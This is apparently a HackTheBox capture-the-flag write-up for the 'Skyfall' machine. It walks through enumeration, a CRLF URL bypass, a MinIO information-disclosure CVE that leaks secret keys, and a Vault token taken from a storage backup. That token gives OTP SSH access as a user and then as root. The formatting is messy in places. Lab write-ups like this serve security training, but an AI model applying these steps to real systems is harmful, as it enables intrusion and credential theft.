Skyfall — HackTheBox Seasonal Machine Simple Writeup by Karthikeyan Nagaraj | 2024

Enumeration and Analysis
1.1) Service Enumeration — Nmap
1.2) Directory Enumeration — Gobuster (or) Dirsearch
1.3) Subdomain Enumeration — GobusterInitial Foothold
2.1) Port — 80
2.2) Getting into the Machine
2.3) User.txt — Gaining User AccessPrivilege Escalation — Pivoting
3.1) Root.txt — Gaining Root AccessConnect to the HackTheBox’s Seasonal Machine’s VPNDownload the resources here — https://github.com/Cyberw1ng/OSCP/tree/main/HackTheBox/SkyfallAdd the below hosts to /etc/hosts using the below command.
Make sure to Replace HackTheBox’s IP
echo “IP skyfall.htb demo.skyfall.htb prd23-s3-backend.skyfall.htb prd23-vault-internal.skyfall.htb” | sudo tee -a /etc/hostsGrab a Coffee and start the process!

1. Service Enumeration — Nmap

Let’s Perform a basic Nmap scan using the below command:
nmap -sC -sV IP

ORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 65:70:f7:12:47:07:3a:88:8e:27:e9:cb:44:5d:10:fb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCVqvI8vGs8EIUAAUiRze8kfKmYh9ETTUei3zRd1wWWLRBjSm+soBLfclIUP69cNtQOa961nyt2/BOwuR35cLR4=
| 256 74:48:33:07:b7:88:9d:32:0e:3b:ec:16:aa:b4:c8:fe (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINk0VgEkDNZoIJwcG5LEVZDZkEeSRHLBmAOtd/pduzRW

80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: Skyfall - Introducing Sky Storage!
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

2. Directory Enumeration — Gobuster (or) Dirsearch

Then, perform a Directory Enumeration using the following command dirsearch -u skyfall.htb -e*
(or)
gobuster dir -u http://skyfall.htb/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

Found a Subdomain

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://skyfall.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Progress: 28 / 19967 (0.14%)[ERROR] Get "http://skyfall.htb/assets/":
Progress: 19966 / 19967 (99.99%)
===============================================================
demo.skyfall.htb

Finished

3. Subdomain Enumeration — Gobuster

Similarly, perform a DNS Enumeration using the following command — gobuster dns -d skyfall.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 20But Nothing Found Interesting in Scan.

1. Port — 80

On Enumerating skyfall.htb we’ll get a subdomain demo.skyfall.htbIf you followed the pre-requisites section then open http://demo.skyfall.htb . Else, add it to /etc/hosts and Open.We found a Credential guest:guest ,Log in to the Account.There we can upload, download, rename, and delete a file, Unfortunately, Nothing works.Upon Clicking Minio, you’ll see a Forbidden Page

6. If you add a CRLF payload at the end of URL, we can able to Access the Page. http://demo.skyfall.htb/metrics%0a

7. From this page, we can find the address of the MinIO cluster:http://prd23-s3-backend.skyfall.htb/minio/v2/metrics/cluster

8. On Researching /minio/v2/metrics/cluster I get to know about an Information Disclosure Vulnerability — CVE-2023–28432 (Research to Get Clue about the below POC and to know why I’m capturing the below req)

9. If the vulnerability is present, the response will include all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD.

2. User.txt — Getting into the Machine

Download and install the Minio tool to get started. Use the below commands to install it.curl https://dl.min.io/client/mc/release/linux-amd64/mc \
--create-dirs \
-o $HOME/minio-binaries/mc

chmod +x $HOME/minio-binaries/mc
export PATH=$PATH:$HOME/minio-binaries/

2. After Installing the tool, use the below command to set an alias named “myminio” for connecting to an S3-compatible storage service hosted at http://prd23-s3-backend.skyfall.htb with the provided access and secret keys. The alias makes it easy to interact with this storage service using the mc tool. (Make sure to Replace the ACCESS_KEY and SECRET_KEY)

mc alias set myminio http://prd23-s3-backend.skyfall.htb ACCESS_KEY SECRET_KEY

3. Now, lets list all the files in the Service using,
mc ls — recursive — versions myminio

mc ls --recursive --versions myminio

[2023-11-08 10:29:15 IST] 0B askyy/
[2023-11-08 11:05:28 IST] 48KiB STANDARD bba1fcc2-331d-41d4-845b-0887152f19ec v1 PUT askyy/Welcome.pdf
[2023-11-10 03:07:25 IST] 2.5KiB STANDARD 25835695-5e73-4c13-82f7-30fd2da2cf61 v3 PUT askyy/home_backup.tar.gz
[2023-11-10 03:07:09 IST] 2.6KiB STANDARD 2b75346d-2a47-4203-ab09-3c9f878466b8 v2 PUT askyy/home_backup.tar.gz
[2023-11-10 03:06:30 IST] 1.2MiB STANDARD 3c498578-8dfe-43b7-b679-32a3fe42018f v1 PUT askyy/home_backup.tar.gz
[2023-11-08 10:28:56 IST] 0B btanner/
[2023-11-08 11:05:36 IST] 48KiB STANDARD null v1 PUT btanner/Welcome.pdf
[2023-11-08 10:28:33 IST] 0B emoneypenny/
[2023-11-08 11:05:56 IST] 48KiB STANDARD null v1 PUT emoneypenny/Welcome.pdf
[2023-11-08 10:28:22 IST] 0B gmallory/
[2023-11-08 11:06:02 IST] 48KiB STANDARD null v1 PUT gmallory/Welcome.pdf
[2023-11-08 05:38:01 IST] 0B guest/
[2023-11-08 05:38:05 IST] 48KiB STANDARD null v1 PUT guest/Welcome.pdf
[2023-11-08 10:29:05 IST] 0B jbond/
[2023-11-08 11:05:45 IST] 48KiB STANDARD null v1 PUT jbond/Welcome.pdf
[2023-11-08 10:28:10 IST] 0B omansfield/
[2023-11-08 11:06:09 IST] 48KiB STANDARD null v1 PUT omansfield/Welcome.pdf
[2023-11-08 10:28:45 IST] 0B rsilva/
[2023-11-08 11:05:51 IST] 48KiB STANDARD null v1 PUT rsilva/Welcome.pdf

4. Let’s download the home_backup tar and Examine the Files using the below command,

mc cp — vid 2b75346d-2a47–4203-ab09–3c9f878466b8 myminio/askyy/home_backup.tar.gz ./home_backup.tar.gz
tar -xzvf home_backup.tar.gz
cat .bashrc

5. We found a Vault API address and Vault Token in .bashrc file

6. Use the below commands to download Vault and login to it
(Make sure to paste the Above token in Login)

$ wget https://releases.hashicorp.com/vault/1.15.5/vault_1.15.5_linux_amd64.zip
$ unzip vault_1.15.5_linux_amd64.zip
$ export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb"
$ ./vault login

7. Now, Use ./vault token capabilities ssh/roles:

This command checks the capabilities of the token with regard to the SSH roles in the Vault. In this case, the capabilities include the ability to list.

8. Then Use./vault list ssh/roles:

This command lists the available SSH roles in the Vault. It displays the roles that have been configured for SSH authentication.

9. Now use the below command, which initiate an SSH session in one-time password (OTP) mode for a specific role named dev_otp_key_role. The connection is made to the SSH server with the username askyy at the specified IP address (HTB_IP). Additionally, the option -strict-host-key-checking=no is used to disable strict host key checking during the connection.

Make sure the replace your Machine IP in the below command

$ ./vault ssh -role dev_otp_key_role -mode OTP -strict-host-key-checking=no askyy@HTB_IP

Warning: Permanently added '10.129.218.149' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-92-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
askyy@skyfall:~$ cat user.txt
3294a753bfe64cXXXXXXXXXX87422f76

Type sudo -l, to display the list of commands or command patterns that this user is allowed to execute with sudo privileges.askyy@skyfall:~$ sudo -l

Matching Defaults entries for askyy on skyfall:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User askyy may run the following commands on skyfall:
(ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml [-vhd]*
(ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml

2. Now, let's delete the debug.log file and create it again using
rm -rf debug.log
touch debug.log

3. Then, Run the below command
sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -vd

4. The Above command executes the vault-unseal with elevated privileges using sudo. The -c option specifies a configuration file (/etc/vault-unseal.yaml), and -vd enables verbose mode for debugging.

5. After doing the above 3 steps, type the exit command.

6. After you log out, type the below commands
export VAULT_ADDR=”http://prd23-vault-internal.skyfall.htb"
./vault login

7. We use the export VAULT_ADDR command to set the address of the Vault server. The subsequent ./vault login command is employed to authenticate and obtain access to Vault's functionalities. Finally, you have to use the ./vault ssh command, configured with the role admin_otp_key_role and OTP mode, to generate SSH credentials for the specified user (root) on a target server with the specified IP address (HTB_IP). The option -strict-host-key-checking=no is used to bypass strict host key checking during the SSH connection process.